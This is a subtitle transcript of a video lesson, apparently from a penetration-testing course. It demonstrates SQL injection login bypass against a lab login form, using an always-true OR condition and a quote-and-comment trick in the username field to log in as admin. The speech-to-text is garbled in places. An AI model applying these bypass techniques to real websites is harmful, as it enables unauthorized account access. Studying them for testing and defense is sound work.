1
00:00:02,460 --> 00:00:10,150
OK so now we know that we can put any code we want in here and it's going to be executed on the system.

2
00:00:10,170 --> 00:00:15,740
So let's have another look now at the statement so the statement says select start from accounts where

3
00:00:15,750 --> 00:00:21,240
username is equal to the user name that we put here and passwords equal to the password that we put

4
00:00:21,240 --> 00:00:22,350
there.

5
00:00:22,350 --> 00:00:28,480
Let's see if we can use that to log in without using a password without even knowing the password.

6
00:00:28,650 --> 00:00:30,230
And I'm going to be doing that with the admin.

7
00:00:30,240 --> 00:00:33,420
So the admin username is going to be admin

8
00:00:36,570 --> 00:00:39,030
and I don't know what the password is for the admin.

9
00:00:39,150 --> 00:00:43,560
So I'm going to do I'm just going to put anything.

10
00:00:43,600 --> 00:00:50,850
So nothing really any any random password and any code where I should run here we were doing.

11
00:00:50,860 --> 00:00:53,430
And one is equal to one and or stuff.

12
00:00:53,440 --> 00:01:00,360
So what I'm going to do is I'm going to do or instead of and then I'm going to say one is equal to one.

13
00:01:00,440 --> 00:01:08,120
So what our code is going to be when I say run this once I inject this this is going to go in here like

14
00:01:08,120 --> 00:01:12,430
we were doing before so our code is going to look like this.

15
00:01:12,440 --> 00:01:16,890
So it's going to be Celeste's are from accounts we're using them as equal to men.

16
00:01:17,950 --> 00:01:19,910
And the password is equal to A.

17
00:01:19,910 --> 00:01:20,970
Now this is wrong.

18
00:01:21,960 --> 00:01:25,080
Or one is equal to 1 which is right.

19
00:01:25,320 --> 00:01:29,610
So anytime you have an R if the OR condition is right everything is right.

20
00:01:29,610 --> 00:01:31,610
That's the way our statement works.

21
00:01:31,740 --> 00:01:34,630
So select start from accounts are using a physical to men.

22
00:01:34,660 --> 00:01:38,300
OK user name is equal to men and passwords equal to A.

23
00:01:38,310 --> 00:01:39,300
That's wrong.

24
00:01:39,600 --> 00:01:40,630
All one is equal to one.

25
00:01:40,640 --> 00:01:41,830
OK I'll accept that.

26
00:01:41,940 --> 00:01:47,940
And then it's actually going to execute it and let us log into the Azman without even knowing the password

27
00:01:47,940 --> 00:01:48,870
for the other.

28
00:01:49,200 --> 00:01:50,960
So let's try to inject this now.

29
00:01:56,480 --> 00:02:02,910
And as you can see I was able to log in as admin and Monkey is the signature for the admin.

30
00:02:03,180 --> 00:02:09,800
Now bypassing logons can be done in so many ways depending on the code that's written on the page and

31
00:02:09,800 --> 00:02:14,360
dependent on the way you want to do it and how you're imagining the code and all of the cases when you

32
00:02:14,360 --> 00:02:17,150
put the single code here you want see this message.

33
00:02:17,150 --> 00:02:22,340
Sometimes you do see it which makes your job so much easier if you don't then you kind of need to guess

34
00:02:22,340 --> 00:02:23,870
what it looks like.

35
00:02:23,870 --> 00:02:28,610
So I'm going to show you another example of bypassing instead of injecting the code like this.

36
00:02:29,310 --> 00:02:35,240
The admin parameter is actually injectable as well as you see when I put the single quote the privater

37
00:02:35,280 --> 00:02:42,010
is injectable exactly the same way as the password so we can inject code in the user name as well.

38
00:02:42,360 --> 00:02:46,920
And what I'm going to do now so let's have a look on this and I'm just going to resell it to the way

39
00:02:46,920 --> 00:02:48,230
it would usually look like.

40
00:02:48,240 --> 00:02:56,060
So you'd have the username and password are the fields that you whatever you put in here are going to

41
00:02:56,060 --> 00:02:59,260
be substituted and the username and password.

42
00:02:59,600 --> 00:03:05,800
So let's try to inject something in the username and what I'm going to say is I'm going to say user

43
00:03:05,800 --> 00:03:12,340
name as you call to admin and then I'm going to close the quote myself and then I'm going to add a comment.

44
00:03:12,560 --> 00:03:17,480
So my statement when I read this statement is going to look like this and I'm actually just going to

45
00:03:17,480 --> 00:03:18,570
copy it here.

46
00:03:18,890 --> 00:03:27,630
And when I inject when I put this code in here and then in my name it's going to inject that in there.

47
00:03:27,660 --> 00:03:32,350
So this is what the code is going to look like it's going to select start from accounts where a username

48
00:03:32,370 --> 00:03:34,030
is equal to Aardman.

49
00:03:34,320 --> 00:03:40,670
I close the code myself here using this right there and then I've added a comment.

50
00:03:40,680 --> 00:03:43,660
So basically all of this is not even going to be executed.

51
00:03:43,950 --> 00:03:49,050
So the code is going to be this it's going to be Selecta are from accounts where user name is equal

52
00:03:49,050 --> 00:03:54,220
to admin and skill let me luggin without even entering anything in the password.

53
00:03:54,660 --> 00:03:56,950
So let's do this.

54
00:03:57,130 --> 00:04:03,310
I'm going to put my user name as admin and I close the quote and add a comment and then you can put

55
00:04:03,310 --> 00:04:04,510
any password you want.

56
00:04:04,570 --> 00:04:11,530
I'm just going up with number one and I'm going to log in and as you can see I managed to log in as

57
00:04:11,530 --> 00:04:13,470
admin.

58
00:04:13,650 --> 00:04:16,080
So again this is black box testing.

59
00:04:16,080 --> 00:04:21,270
So you don't really see the code in many cases you want to be playing around with it and see how it

60
00:04:21,270 --> 00:04:22,290
works with you.

61
00:04:22,470 --> 00:04:28,500
But the main thing is you want to test if the Escurial injection exists and you'd use that to in the

62
00:04:28,500 --> 00:04:30,610
method we showed you in the previous video.

63
00:04:30,660 --> 00:04:36,960
So try a single quote try the on statement try half true on statement so once you've got one and then

64
00:04:36,960 --> 00:04:40,650
a false on statement so one is equal to zero or two is equal to zero.

65
00:04:40,800 --> 00:04:47,580
And if they work as expected then your target has on a scale injection and can start playing around

66
00:04:47,580 --> 00:04:47,970
with it.